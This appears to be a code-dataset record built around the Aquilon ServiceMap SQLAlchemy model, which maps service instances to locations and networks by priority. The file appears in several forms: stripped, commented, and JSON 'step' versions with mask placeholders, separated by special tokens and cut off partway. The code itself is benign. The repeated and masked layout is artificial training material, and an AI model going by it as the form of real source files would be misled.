q = q.filter_by(service=dbservice)
q = q.options(contains_eager('service_instance'), defer(
'service_instance.comments'), lazyload('service_instance.service'))
instances = []
min_seen_priority = maxsize,
for map in q:
si = map.service_instance
if min_seen_priority > map.priority:
instances = [si]
min_seen_priority = map.priority
elif min_seen_priority == map.priority:
instances.append(si)
return instances
@staticmethod
def get_mapped_instance_cache(dbservices, dbstage, dblocation,
dbnetwork=None):
"""Returns dict of requested services to closest mapped instances."""
session = object_session(dblocation)
location_ids = [loc.id for loc in dblocation.parents]
location_ids.append(dblocation.id)
PSLI = PersonalityServiceListItem
q = session.query(ServiceMap)
q = q.join(ServiceInstance)
q = q.filter(ServiceInstance.service_id.in_(srv.id for srv in
dbservices))
q = q.outerjoin(PSLI, and_(PSLI.personality_stage_id == dbstage.id,
PSLI.service_id == ServiceInstance.service_id))
q = q.filter(or_(and_(ServiceMap.personality_id == null(),
ServiceMap.host_environment_id == null()), ServiceMap.
personality == dbstage.personality, ServiceMap.
host_environment_id == coalesce(PSLI.host_environment_id,
dbstage.personality.host_environment.id)))
if dbnetwork:
q = q.filter(or_(ServiceMap.location_id.in_(location_ids),
ServiceMap.network_id == dbnetwork.id))
else:
q = q.filter(ServiceMap.location_id.in_(location_ids))
q = q.options(contains_eager('service_instance'), defer(
'service_instance.comments'), undefer(
'service_instance._client_count'), lazyload(
'service_instance.service'))
instance_cache = {}
instance_priority = defaultdict(lambda : (maxsize,))
for map in q:
si = map.service_instance
service = si.service
if instance_priority[service] > map.priority:
instance_cache[service] = [si]
instance_priority[service] = map.priority
elif instance_priority[service] == map.priority:
instance_cache[service].append(si)
return instance_cache
<|reserved_special_token_1|>
<|reserved_special_token_0|>
from collections import defaultdict
from datetime import datetime
from sys import maxsize
from sqlalchemy import Column, Integer, Sequence, DateTime, ForeignKey, UniqueConstraint, CheckConstraint
from sqlalchemy.orm import relation, deferred, backref, defer, undefer, lazyload, contains_eager, object_session
from sqlalchemy.sql import and_, or_, null, case
from sqlalchemy.sql.functions import coalesce
from aquilon.exceptions_ import InternalError, AquilonError
from aquilon.aqdb.model import Base, Location, Desk, Rack, Room, Bunker, Building, City, Campus, Country, Continent, Hub, Organization, ServiceInstance, Network, Personality, PersonalityServiceListItem, HostEnvironment
_TN = 'service_map'
_LOCATION_PRIORITY = {Rack: 1000, Desk: 1000, Room: 1100, Bunker: 1200,
Building: 1300, City: 1400, Campus: 1500, Country: 1600, Continent:
1700, Hub: 1800, Organization: 1900}
_NETWORK_PRIORITY = 100
_TARGET_PERSONALITY = 10
_TARGET_ENVIRONMENT = 100
_TARGET_GLOBAL = 1000
class ServiceMap(Base):
""" Service Map: mapping a service_instance to a location.
The rows in this table assert that an instance is a valid useable
default that clients can choose as their provider during service
autoconfiguration.
The contained information is actually a triplet:
- The service instance to use,
- Rules for the scope where the map is valid,
- Rules for which objects does the map apply.
"""
__tablename__ = _TN
id = Column(Integer, Sequence('%s_id_seq' % _TN), primary_key=True)
service_instance_id = Column(ForeignKey(ServiceInstance.id, ondelete=
'CASCADE'), nullable=False)
personality_id = Column(ForeignKey(Personality.id, ondelete='CASCADE'),
nullable=True, index=True)
host_environment_id = Column(ForeignKey(HostEnvironment.id), nullable=True)
location_id = Column(ForeignKey(Location.id, ondelete='CASCADE'),
nullable=True, index=True)
network_id = Column(ForeignKey(Network.id, ondelete='CASCADE'),
nullable=True, index=True)
creation_date = deferred(Column(DateTime, default=datetime.now,
nullable=False))
service_instance = relation(ServiceInstance, innerjoin=True, backref=
backref('service_map', cascade='all, delete-orphan',
passive_deletes=True))
personality = relation(Personality)
host_environment = relation(HostEnvironment)
location = relation(Location)
network = relation(Network)
__table_args__ = UniqueConstraint(service_instance_id, personality_id,
host_environment_id, location_id, network_id, name='%s_uk' % _TN
), CheckConstraint(case([(personality_id != null(), 1)], else_=0) +
case([(host_environment_id != null(), 1)], else_=0) <= 1, name=
'%s_target_ck' % _TN)
@property
def service(self):
return self.service_instance.service
@property
def scope_priority(self):
if self.network:
return _NETWORK_PRIORITY
else:
try:
return _LOCATION_PRIORITY[type(self.location)]
except KeyError:
raise InternalError(
'The service map is not prepared to handle location class %r'
% type(self.location))
@property
def object_priority(self):
if self.personality:
return _TARGET_PERSONALITY
elif self.host_environment:
return _TARGET_ENVIRONMENT
else:
return _TARGET_GLOBAL
@property
def priority(self):
return self.object_priority, self.scope_priority
@property
def scope(self):
if self.location:
return self.location
else:
return self.network
def __init__(self, service_instance, network=None, location=None,
personality=None, host_environment=None):
if network and location:
raise AquilonError(
"A service can't be mapped to a Network and a Location at the same time"
)
if network is None and location is None:
raise AquilonError(
                'A service should be mapped to a Network or a Location')
if personality and host_environment:
raise AquilonError(
"A service can't be mapped to a Personality and a HostEnvironment at the same time"
)
super(ServiceMap, self).__init__(service_instance=service_instance,
network=network, location=location, personality=personality,
host_environment=host_environment)
@staticmethod
def get_location_mapped_instances(dbservice, dblocation):
session = object_session(dbservice)
location_ids = [loc.id for loc in dblocation.parents]
location_ids.append(dblocation.id)
q = session.query(ServiceMap)
q = q.filter(and_(ServiceMap.personality_id == null(), ServiceMap.
host_environment_id == null()))
q = q.filter(ServiceMap.location_id.in_(location_ids))
q = q.join(ServiceInstance)
q = q.filter_by(service=dbservice)
q = q.options(contains_eager('service_instance'), defer(
'service_instance.comments'), lazyload('service_instance.service'))
instances = []
min_seen_priority = maxsize,
for map in q:
si = map.service_instance
if min_seen_priority > map.priority:
instances = [si]
min_seen_priority = map.priority
elif min_seen_priority == map.priority:
instances.append(si)
return instances
@staticmethod
def get_mapped_instance_cache(dbservices, dbstage, dblocation,
dbnetwork=None):
"""Returns dict of requested services to closest mapped instances."""
session = object_session(dblocation)
location_ids = [loc.id for loc in dblocation.parents]
location_ids.append(dblocation.id)
PSLI = PersonalityServiceListItem
q = session.query(ServiceMap)
q = q.join(ServiceInstance)
q = q.filter(ServiceInstance.service_id.in_(srv.id for srv in
dbservices))
q = q.outerjoin(PSLI, and_(PSLI.personality_stage_id == dbstage.id,
PSLI.service_id == ServiceInstance.service_id))
q = q.filter(or_(and_(ServiceMap.personality_id == null(),
ServiceMap.host_environment_id == null()), ServiceMap.
personality == dbstage.personality, ServiceMap.
host_environment_id == coalesce(PSLI.host_environment_id,
dbstage.personality.host_environment.id)))
if dbnetwork:
q = q.filter(or_(ServiceMap.location_id.in_(location_ids),
ServiceMap.network_id == dbnetwork.id))
else:
q = q.filter(ServiceMap.location_id.in_(location_ids))
q = q.options(contains_eager('service_instance'), defer(
'service_instance.comments'), undefer(
'service_instance._client_count'), lazyload(
'service_instance.service'))
instance_cache = {}
instance_priority = defaultdict(lambda : (maxsize,))
for map in q:
si = map.service_instance
service = si.service
if instance_priority[service] > map.priority:
instance_cache[service] = [si]
instance_priority[service] = map.priority
elif instance_priority[service] == map.priority:
instance_cache[service].append(si)
return instance_cache
<|reserved_special_token_1|>
# -*- cpy-indent-level: 4; indent-tabs-mode: nil -*-
# ex: set expandtab softtabstop=4 shiftwidth=4:
#
# Copyright (C) 2008,2009,2010,2011,2012,2013,2014,2015,2016 Contributor
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Maps service instances to locations. See class.__doc__ """
from collections import defaultdict
from datetime import datetime
from sys import maxsize
from sqlalchemy import (Column, Integer, Sequence, DateTime, ForeignKey,
UniqueConstraint, CheckConstraint)
from sqlalchemy.orm import (relation, deferred, backref, defer, undefer,
lazyload, contains_eager, object_session)
from sqlalchemy.sql import and_, or_, null, case
from sqlalchemy.sql.functions import coalesce
from aquilon.exceptions_ import InternalError, AquilonError
from aquilon.aqdb.model import (Base, Location, Desk, Rack, Room, Bunker,
Building, City, Campus, Country, Continent, Hub,
Organization, ServiceInstance, Network, Personality,
PersonalityServiceListItem, HostEnvironment)
_TN = 'service_map'
# TODO: We could calculate this map by building a graph of Location subclasses
# using Location.valid_parents as edges, and then doing a topological sort
# NOTE: The actual values here are unimportant, what matters is their order
_LOCATION_PRIORITY = {
# Rack and Desk are at the same level
Rack: 1000,
Desk: 1000,
Room: 1100,
Bunker: 1200,
Building: 1300,
City: 1400,
Campus: 1500,
Country: 1600,
Continent: 1700,
Hub: 1800,
Organization: 1900,
}
# NOTE: The actual value here is unimportant, what matters is the order wrt.
# location-based priorities
_NETWORK_PRIORITY = 100
# NOTE: The actual values here are unimportant, only their order matters
_TARGET_PERSONALITY = 10
_TARGET_ENVIRONMENT = 100
_TARGET_GLOBAL = 1000
class ServiceMap(Base):
""" Service Map: mapping a service_instance to a location.
The rows in this table assert that an instance is a valid useable
default that clients can choose as their provider during service
autoconfiguration.
The contained information is actually a triplet:
- The service instance to use,
- Rules for the scope where the map is valid,
- Rules for which objects does the map apply.
"""
__tablename__ = _TN
id = Column(Integer, Sequence('%s_id_seq' % _TN), primary_key=True)
service_instance_id = Column(ForeignKey(ServiceInstance.id,
ondelete='CASCADE'),
nullable=False)
personality_id = Column(ForeignKey(Personality.id, ondelete='CASCADE'),
nullable=True, index=True)
host_environment_id = Column(ForeignKey(HostEnvironment.id), nullable=True)
location_id = Column(ForeignKey(Location.id, ondelete='CASCADE'),
nullable=True, index=True)
network_id = Column(ForeignKey(Network.id, ondelete='CASCADE'),
nullable=True, index=True)
creation_date = deferred(Column(DateTime, default=datetime.now,
nullable=False))
service_instance = relation(ServiceInstance, innerjoin=True,
backref=backref('service_map',
cascade="all, delete-orphan",
passive_deletes=True))
personality = relation(Personality)
host_environment = relation(HostEnvironment)
location = relation(Location)
network = relation(Network)
__table_args__ = (UniqueConstraint(service_instance_id,
personality_id, host_environment_id,
location_id, network_id,
name='%s_uk' % _TN),
# At most one of personality_id and host_environment_id
# can be not NULL
CheckConstraint(case([(personality_id != null(), 1)], else_=0) +
case([(host_environment_id != null(), 1)], else_=0) <= 1,
name='%s_target_ck' % _TN))
@property
def service(self):
return self.service_instance.service
@property
def scope_priority(self):
if self.network:
return _NETWORK_PRIORITY
else:
try:
return _LOCATION_PRIORITY[type(self.location)]
except KeyError: # pragma: no cover
raise InternalError("The service map is not prepared to handle "
"location class %r" % type(self.location))
@property
def object_priority(self):
if self.personality:
return _TARGET_PERSONALITY
elif self.host_environment:
return _TARGET_ENVIRONMENT
else:
return _TARGET_GLOBAL
@property
def priority(self):
return (self.object_priority, self.scope_priority)
@property
def scope(self):
if self.location:
return self.location
else:
return self.network
def __init__(self, service_instance, network=None, location=None, personality=None,
host_environment=None):
if network and location: # pragma: no cover
raise AquilonError("A service can't be mapped to a Network and a "
"Location at the same time")
if network is None and location is None: # pragma: no cover
            raise AquilonError("A service should be mapped to a Network or a "
"Location")
if personality and host_environment: # pragma: no cover
raise AquilonError("A service can't be mapped to a Personality and "
"a HostEnvironment at the same time")
super(ServiceMap, self).__init__(service_instance=service_instance,
network=network, location=location,
personality=personality,
host_environment=host_environment)
@staticmethod
def get_location_mapped_instances(dbservice, dblocation):
# Simplified service map lookup - single service, location-based maps
# only, no client bindings
session = object_session(dbservice)
location_ids = [loc.id for loc in dblocation.parents]
location_ids.append(dblocation.id)
q = session.query(ServiceMap)
q = q.filter(and_(ServiceMap.personality_id == null(),
ServiceMap.host_environment_id == null()))
q = q.filter(ServiceMap.location_id.in_(location_ids))
q = q.join(ServiceInstance)
q = q.filter_by(service=dbservice)
q = q.options(contains_eager('service_instance'),
defer('service_instance.comments'),
lazyload('service_instance.service'))
instances = []
min_seen_priority = (maxsize,)
# We want the instance(s) with the lowest priority
for map in q:
si = map.service_instance
if min_seen_priority > map.priority:
instances = [si]
min_seen_priority = map.priority
elif min_seen_priority == map.priority:
instances.append(si)
return instances
@staticmethod
def get_mapped_instance_cache(dbservices, dbstage, dblocation,
dbnetwork=None):
"""Returns dict of requested services to closest mapped instances."""
session = object_session(dblocation)
location_ids = [loc.id for loc in dblocation.parents]
location_ids.append(dblocation.id)
PSLI = PersonalityServiceListItem
q = session.query(ServiceMap)
q = q.join(ServiceInstance)
q = q.filter(ServiceInstance.service_id.in_(srv.id for srv in dbservices))
q = q.outerjoin(PSLI, and_(PSLI.personality_stage_id == dbstage.id,
PSLI.service_id == ServiceInstance.service_id))
# Rules for filtering by target object
q = q.filter(or_(
and_(ServiceMap.personality_id == null(),
ServiceMap.host_environment_id == null()),
ServiceMap.personality == dbstage.personality,
ServiceMap.host_environment_id == coalesce(
PSLI.host_environment_id,
dbstage.personality.host_environment.id)))
# Rules for filtering by location/scope
if dbnetwork:
q = q.filter(or_(ServiceMap.location_id.in_(location_ids),
ServiceMap.network_id == dbnetwork.id))
else:
q = q.filter(ServiceMap.location_id.in_(location_ids))
q = q.options(contains_eager('service_instance'),
defer('service_instance.comments'),
undefer('service_instance._client_count'),
lazyload('service_instance.service'))
instance_cache = {}
instance_priority = defaultdict(lambda: (maxsize,))
# For every service, we want the instance(s) with the lowest priority
for map in q:
si = map.service_instance
service = si.service
if instance_priority[service] > map.priority:
instance_cache[service] = [si]
instance_priority[service] = map.priority
elif instance_priority[service] == map.priority:
instance_cache[service].append(si)
return instance_cache
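
# A brief worked illustration, using only the constants defined above: map
# selection keeps the lowest (object_priority, scope_priority) tuple per
# service, so a personality-targeted map on a building outranks a global map
# on a rack.
personality_building = (_TARGET_PERSONALITY, _LOCATION_PRIORITY[Building])  # (10, 1300)
global_rack = (_TARGET_GLOBAL, _LOCATION_PRIORITY[Rack])                    # (1000, 1000)
assert personality_building < global_rack  # the smaller tuple wins in the cache-building loops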
|
flexible
|
{
"blob_id": "a9e0659c6a18ffc954079845b7d0de04c46a78c9",
"index": 7204,
"step-1": "<mask token>\n\n\nclass ServiceMap(Base):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n @property\n def service(self):\n return self.service_instance.service\n\n @property\n def scope_priority(self):\n if self.network:\n return _NETWORK_PRIORITY\n else:\n try:\n return _LOCATION_PRIORITY[type(self.location)]\n except KeyError:\n raise InternalError(\n 'The service map is not prepared to handle location class %r'\n % type(self.location))\n\n @property\n def object_priority(self):\n if self.personality:\n return _TARGET_PERSONALITY\n elif self.host_environment:\n return _TARGET_ENVIRONMENT\n else:\n return _TARGET_GLOBAL\n\n @property\n def priority(self):\n return self.object_priority, self.scope_priority\n\n @property\n def scope(self):\n if self.location:\n return self.location\n else:\n return self.network\n\n def __init__(self, service_instance, network=None, location=None,\n personality=None, host_environment=None):\n if network and location:\n raise AquilonError(\n \"A service can't be mapped to a Network and a Location at the same time\"\n )\n if network is None and location is None:\n raise AquilonError(\n 'A service should by mapped to a Network or a Location')\n if personality and host_environment:\n raise AquilonError(\n \"A service can't be mapped to a Personality and a HostEnvironment at the same time\"\n )\n super(ServiceMap, self).__init__(service_instance=service_instance,\n network=network, location=location, personality=personality,\n host_environment=host_environment)\n\n @staticmethod\n def get_location_mapped_instances(dbservice, dblocation):\n session = object_session(dbservice)\n location_ids = [loc.id for loc in dblocation.parents]\n location_ids.append(dblocation.id)\n q = session.query(ServiceMap)\n q = q.filter(and_(ServiceMap.personality_id == null(), ServiceMap.\n host_environment_id == null()))\n q = q.filter(ServiceMap.location_id.in_(location_ids))\n q = q.join(ServiceInstance)\n q = q.filter_by(service=dbservice)\n q = q.options(contains_eager('service_instance'), defer(\n 'service_instance.comments'), lazyload('service_instance.service'))\n instances = []\n min_seen_priority = maxsize,\n for map in q:\n si = map.service_instance\n if min_seen_priority > map.priority:\n instances = [si]\n min_seen_priority = map.priority\n elif min_seen_priority == map.priority:\n instances.append(si)\n return instances\n\n @staticmethod\n def get_mapped_instance_cache(dbservices, dbstage, dblocation,\n dbnetwork=None):\n \"\"\"Returns dict of requested services to closest mapped instances.\"\"\"\n session = object_session(dblocation)\n location_ids = [loc.id for loc in dblocation.parents]\n location_ids.append(dblocation.id)\n PSLI = PersonalityServiceListItem\n q = session.query(ServiceMap)\n q = q.join(ServiceInstance)\n q = q.filter(ServiceInstance.service_id.in_(srv.id for srv in\n dbservices))\n q = q.outerjoin(PSLI, and_(PSLI.personality_stage_id == dbstage.id,\n PSLI.service_id == ServiceInstance.service_id))\n q = q.filter(or_(and_(ServiceMap.personality_id == null(), \n ServiceMap.host_environment_id == null()), ServiceMap.\n personality == dbstage.personality, ServiceMap.\n host_environment_id == coalesce(PSLI.host_environment_id,\n dbstage.personality.host_environment.id)))\n if dbnetwork:\n q = q.filter(or_(ServiceMap.location_id.in_(location_ids), \n 
ServiceMap.network_id == dbnetwork.id))\n else:\n q = q.filter(ServiceMap.location_id.in_(location_ids))\n q = q.options(contains_eager('service_instance'), defer(\n 'service_instance.comments'), undefer(\n 'service_instance._client_count'), lazyload(\n 'service_instance.service'))\n instance_cache = {}\n instance_priority = defaultdict(lambda : (maxsize,))\n for map in q:\n si = map.service_instance\n service = si.service\n if instance_priority[service] > map.priority:\n instance_cache[service] = [si]\n instance_priority[service] = map.priority\n elif instance_priority[service] == map.priority:\n instance_cache[service].append(si)\n return instance_cache\n",
"step-2": "<mask token>\n\n\nclass ServiceMap(Base):\n <mask token>\n __tablename__ = _TN\n id = Column(Integer, Sequence('%s_id_seq' % _TN), primary_key=True)\n service_instance_id = Column(ForeignKey(ServiceInstance.id, ondelete=\n 'CASCADE'), nullable=False)\n personality_id = Column(ForeignKey(Personality.id, ondelete='CASCADE'),\n nullable=True, index=True)\n host_environment_id = Column(ForeignKey(HostEnvironment.id), nullable=True)\n location_id = Column(ForeignKey(Location.id, ondelete='CASCADE'),\n nullable=True, index=True)\n network_id = Column(ForeignKey(Network.id, ondelete='CASCADE'),\n nullable=True, index=True)\n creation_date = deferred(Column(DateTime, default=datetime.now,\n nullable=False))\n service_instance = relation(ServiceInstance, innerjoin=True, backref=\n backref('service_map', cascade='all, delete-orphan',\n passive_deletes=True))\n personality = relation(Personality)\n host_environment = relation(HostEnvironment)\n location = relation(Location)\n network = relation(Network)\n __table_args__ = UniqueConstraint(service_instance_id, personality_id,\n host_environment_id, location_id, network_id, name='%s_uk' % _TN\n ), CheckConstraint(case([(personality_id != null(), 1)], else_=0) +\n case([(host_environment_id != null(), 1)], else_=0) <= 1, name=\n '%s_target_ck' % _TN)\n\n @property\n def service(self):\n return self.service_instance.service\n\n @property\n def scope_priority(self):\n if self.network:\n return _NETWORK_PRIORITY\n else:\n try:\n return _LOCATION_PRIORITY[type(self.location)]\n except KeyError:\n raise InternalError(\n 'The service map is not prepared to handle location class %r'\n % type(self.location))\n\n @property\n def object_priority(self):\n if self.personality:\n return _TARGET_PERSONALITY\n elif self.host_environment:\n return _TARGET_ENVIRONMENT\n else:\n return _TARGET_GLOBAL\n\n @property\n def priority(self):\n return self.object_priority, self.scope_priority\n\n @property\n def scope(self):\n if self.location:\n return self.location\n else:\n return self.network\n\n def __init__(self, service_instance, network=None, location=None,\n personality=None, host_environment=None):\n if network and location:\n raise AquilonError(\n \"A service can't be mapped to a Network and a Location at the same time\"\n )\n if network is None and location is None:\n raise AquilonError(\n 'A service should by mapped to a Network or a Location')\n if personality and host_environment:\n raise AquilonError(\n \"A service can't be mapped to a Personality and a HostEnvironment at the same time\"\n )\n super(ServiceMap, self).__init__(service_instance=service_instance,\n network=network, location=location, personality=personality,\n host_environment=host_environment)\n\n @staticmethod\n def get_location_mapped_instances(dbservice, dblocation):\n session = object_session(dbservice)\n location_ids = [loc.id for loc in dblocation.parents]\n location_ids.append(dblocation.id)\n q = session.query(ServiceMap)\n q = q.filter(and_(ServiceMap.personality_id == null(), ServiceMap.\n host_environment_id == null()))\n q = q.filter(ServiceMap.location_id.in_(location_ids))\n q = q.join(ServiceInstance)\n q = q.filter_by(service=dbservice)\n q = q.options(contains_eager('service_instance'), defer(\n 'service_instance.comments'), lazyload('service_instance.service'))\n instances = []\n min_seen_priority = maxsize,\n for map in q:\n si = map.service_instance\n if min_seen_priority > map.priority:\n instances = [si]\n min_seen_priority = map.priority\n elif min_seen_priority 
== map.priority:\n instances.append(si)\n return instances\n\n @staticmethod\n def get_mapped_instance_cache(dbservices, dbstage, dblocation,\n dbnetwork=None):\n \"\"\"Returns dict of requested services to closest mapped instances.\"\"\"\n session = object_session(dblocation)\n location_ids = [loc.id for loc in dblocation.parents]\n location_ids.append(dblocation.id)\n PSLI = PersonalityServiceListItem\n q = session.query(ServiceMap)\n q = q.join(ServiceInstance)\n q = q.filter(ServiceInstance.service_id.in_(srv.id for srv in\n dbservices))\n q = q.outerjoin(PSLI, and_(PSLI.personality_stage_id == dbstage.id,\n PSLI.service_id == ServiceInstance.service_id))\n q = q.filter(or_(and_(ServiceMap.personality_id == null(), \n ServiceMap.host_environment_id == null()), ServiceMap.\n personality == dbstage.personality, ServiceMap.\n host_environment_id == coalesce(PSLI.host_environment_id,\n dbstage.personality.host_environment.id)))\n if dbnetwork:\n q = q.filter(or_(ServiceMap.location_id.in_(location_ids), \n ServiceMap.network_id == dbnetwork.id))\n else:\n q = q.filter(ServiceMap.location_id.in_(location_ids))\n q = q.options(contains_eager('service_instance'), defer(\n 'service_instance.comments'), undefer(\n 'service_instance._client_count'), lazyload(\n 'service_instance.service'))\n instance_cache = {}\n instance_priority = defaultdict(lambda : (maxsize,))\n for map in q:\n si = map.service_instance\n service = si.service\n if instance_priority[service] > map.priority:\n instance_cache[service] = [si]\n instance_priority[service] = map.priority\n elif instance_priority[service] == map.priority:\n instance_cache[service].append(si)\n return instance_cache\n",
"step-3": "<mask token>\n\n\nclass ServiceMap(Base):\n \"\"\" Service Map: mapping a service_instance to a location.\n The rows in this table assert that an instance is a valid useable\n default that clients can choose as their provider during service\n autoconfiguration.\n\n The contained information is actually a triplet:\n - The service instance to use,\n - Rules for the scope where the map is valid,\n - Rules for which objects does the map apply.\n \"\"\"\n __tablename__ = _TN\n id = Column(Integer, Sequence('%s_id_seq' % _TN), primary_key=True)\n service_instance_id = Column(ForeignKey(ServiceInstance.id, ondelete=\n 'CASCADE'), nullable=False)\n personality_id = Column(ForeignKey(Personality.id, ondelete='CASCADE'),\n nullable=True, index=True)\n host_environment_id = Column(ForeignKey(HostEnvironment.id), nullable=True)\n location_id = Column(ForeignKey(Location.id, ondelete='CASCADE'),\n nullable=True, index=True)\n network_id = Column(ForeignKey(Network.id, ondelete='CASCADE'),\n nullable=True, index=True)\n creation_date = deferred(Column(DateTime, default=datetime.now,\n nullable=False))\n service_instance = relation(ServiceInstance, innerjoin=True, backref=\n backref('service_map', cascade='all, delete-orphan',\n passive_deletes=True))\n personality = relation(Personality)\n host_environment = relation(HostEnvironment)\n location = relation(Location)\n network = relation(Network)\n __table_args__ = UniqueConstraint(service_instance_id, personality_id,\n host_environment_id, location_id, network_id, name='%s_uk' % _TN\n ), CheckConstraint(case([(personality_id != null(), 1)], else_=0) +\n case([(host_environment_id != null(), 1)], else_=0) <= 1, name=\n '%s_target_ck' % _TN)\n\n @property\n def service(self):\n return self.service_instance.service\n\n @property\n def scope_priority(self):\n if self.network:\n return _NETWORK_PRIORITY\n else:\n try:\n return _LOCATION_PRIORITY[type(self.location)]\n except KeyError:\n raise InternalError(\n 'The service map is not prepared to handle location class %r'\n % type(self.location))\n\n @property\n def object_priority(self):\n if self.personality:\n return _TARGET_PERSONALITY\n elif self.host_environment:\n return _TARGET_ENVIRONMENT\n else:\n return _TARGET_GLOBAL\n\n @property\n def priority(self):\n return self.object_priority, self.scope_priority\n\n @property\n def scope(self):\n if self.location:\n return self.location\n else:\n return self.network\n\n def __init__(self, service_instance, network=None, location=None,\n personality=None, host_environment=None):\n if network and location:\n raise AquilonError(\n \"A service can't be mapped to a Network and a Location at the same time\"\n )\n if network is None and location is None:\n raise AquilonError(\n 'A service should by mapped to a Network or a Location')\n if personality and host_environment:\n raise AquilonError(\n \"A service can't be mapped to a Personality and a HostEnvironment at the same time\"\n )\n super(ServiceMap, self).__init__(service_instance=service_instance,\n network=network, location=location, personality=personality,\n host_environment=host_environment)\n\n @staticmethod\n def get_location_mapped_instances(dbservice, dblocation):\n session = object_session(dbservice)\n location_ids = [loc.id for loc in dblocation.parents]\n location_ids.append(dblocation.id)\n q = session.query(ServiceMap)\n q = q.filter(and_(ServiceMap.personality_id == null(), ServiceMap.\n host_environment_id == null()))\n q = q.filter(ServiceMap.location_id.in_(location_ids))\n q = 
q.join(ServiceInstance)\n q = q.filter_by(service=dbservice)\n q = q.options(contains_eager('service_instance'), defer(\n 'service_instance.comments'), lazyload('service_instance.service'))\n instances = []\n min_seen_priority = maxsize,\n for map in q:\n si = map.service_instance\n if min_seen_priority > map.priority:\n instances = [si]\n min_seen_priority = map.priority\n elif min_seen_priority == map.priority:\n instances.append(si)\n return instances\n\n @staticmethod\n def get_mapped_instance_cache(dbservices, dbstage, dblocation,\n dbnetwork=None):\n \"\"\"Returns dict of requested services to closest mapped instances.\"\"\"\n session = object_session(dblocation)\n location_ids = [loc.id for loc in dblocation.parents]\n location_ids.append(dblocation.id)\n PSLI = PersonalityServiceListItem\n q = session.query(ServiceMap)\n q = q.join(ServiceInstance)\n q = q.filter(ServiceInstance.service_id.in_(srv.id for srv in\n dbservices))\n q = q.outerjoin(PSLI, and_(PSLI.personality_stage_id == dbstage.id,\n PSLI.service_id == ServiceInstance.service_id))\n q = q.filter(or_(and_(ServiceMap.personality_id == null(), \n ServiceMap.host_environment_id == null()), ServiceMap.\n personality == dbstage.personality, ServiceMap.\n host_environment_id == coalesce(PSLI.host_environment_id,\n dbstage.personality.host_environment.id)))\n if dbnetwork:\n q = q.filter(or_(ServiceMap.location_id.in_(location_ids), \n ServiceMap.network_id == dbnetwork.id))\n else:\n q = q.filter(ServiceMap.location_id.in_(location_ids))\n q = q.options(contains_eager('service_instance'), defer(\n 'service_instance.comments'), undefer(\n 'service_instance._client_count'), lazyload(\n 'service_instance.service'))\n instance_cache = {}\n instance_priority = defaultdict(lambda : (maxsize,))\n for map in q:\n si = map.service_instance\n service = si.service\n if instance_priority[service] > map.priority:\n instance_cache[service] = [si]\n instance_priority[service] = map.priority\n elif instance_priority[service] == map.priority:\n instance_cache[service].append(si)\n return instance_cache\n",
"step-4": "<mask token>\nfrom collections import defaultdict\nfrom datetime import datetime\nfrom sys import maxsize\nfrom sqlalchemy import Column, Integer, Sequence, DateTime, ForeignKey, UniqueConstraint, CheckConstraint\nfrom sqlalchemy.orm import relation, deferred, backref, defer, undefer, lazyload, contains_eager, object_session\nfrom sqlalchemy.sql import and_, or_, null, case\nfrom sqlalchemy.sql.functions import coalesce\nfrom aquilon.exceptions_ import InternalError, AquilonError\nfrom aquilon.aqdb.model import Base, Location, Desk, Rack, Room, Bunker, Building, City, Campus, Country, Continent, Hub, Organization, ServiceInstance, Network, Personality, PersonalityServiceListItem, HostEnvironment\n_TN = 'service_map'\n_LOCATION_PRIORITY = {Rack: 1000, Desk: 1000, Room: 1100, Bunker: 1200,\n Building: 1300, City: 1400, Campus: 1500, Country: 1600, Continent: \n 1700, Hub: 1800, Organization: 1900}\n_NETWORK_PRIORITY = 100\n_TARGET_PERSONALITY = 10\n_TARGET_ENVIRONMENT = 100\n_TARGET_GLOBAL = 1000\n\n\nclass ServiceMap(Base):\n \"\"\" Service Map: mapping a service_instance to a location.\n The rows in this table assert that an instance is a valid useable\n default that clients can choose as their provider during service\n autoconfiguration.\n\n The contained information is actually a triplet:\n - The service instance to use,\n - Rules for the scope where the map is valid,\n - Rules for which objects does the map apply.\n \"\"\"\n __tablename__ = _TN\n id = Column(Integer, Sequence('%s_id_seq' % _TN), primary_key=True)\n service_instance_id = Column(ForeignKey(ServiceInstance.id, ondelete=\n 'CASCADE'), nullable=False)\n personality_id = Column(ForeignKey(Personality.id, ondelete='CASCADE'),\n nullable=True, index=True)\n host_environment_id = Column(ForeignKey(HostEnvironment.id), nullable=True)\n location_id = Column(ForeignKey(Location.id, ondelete='CASCADE'),\n nullable=True, index=True)\n network_id = Column(ForeignKey(Network.id, ondelete='CASCADE'),\n nullable=True, index=True)\n creation_date = deferred(Column(DateTime, default=datetime.now,\n nullable=False))\n service_instance = relation(ServiceInstance, innerjoin=True, backref=\n backref('service_map', cascade='all, delete-orphan',\n passive_deletes=True))\n personality = relation(Personality)\n host_environment = relation(HostEnvironment)\n location = relation(Location)\n network = relation(Network)\n __table_args__ = UniqueConstraint(service_instance_id, personality_id,\n host_environment_id, location_id, network_id, name='%s_uk' % _TN\n ), CheckConstraint(case([(personality_id != null(), 1)], else_=0) +\n case([(host_environment_id != null(), 1)], else_=0) <= 1, name=\n '%s_target_ck' % _TN)\n\n @property\n def service(self):\n return self.service_instance.service\n\n @property\n def scope_priority(self):\n if self.network:\n return _NETWORK_PRIORITY\n else:\n try:\n return _LOCATION_PRIORITY[type(self.location)]\n except KeyError:\n raise InternalError(\n 'The service map is not prepared to handle location class %r'\n % type(self.location))\n\n @property\n def object_priority(self):\n if self.personality:\n return _TARGET_PERSONALITY\n elif self.host_environment:\n return _TARGET_ENVIRONMENT\n else:\n return _TARGET_GLOBAL\n\n @property\n def priority(self):\n return self.object_priority, self.scope_priority\n\n @property\n def scope(self):\n if self.location:\n return self.location\n else:\n return self.network\n\n def __init__(self, service_instance, network=None, location=None,\n personality=None, 
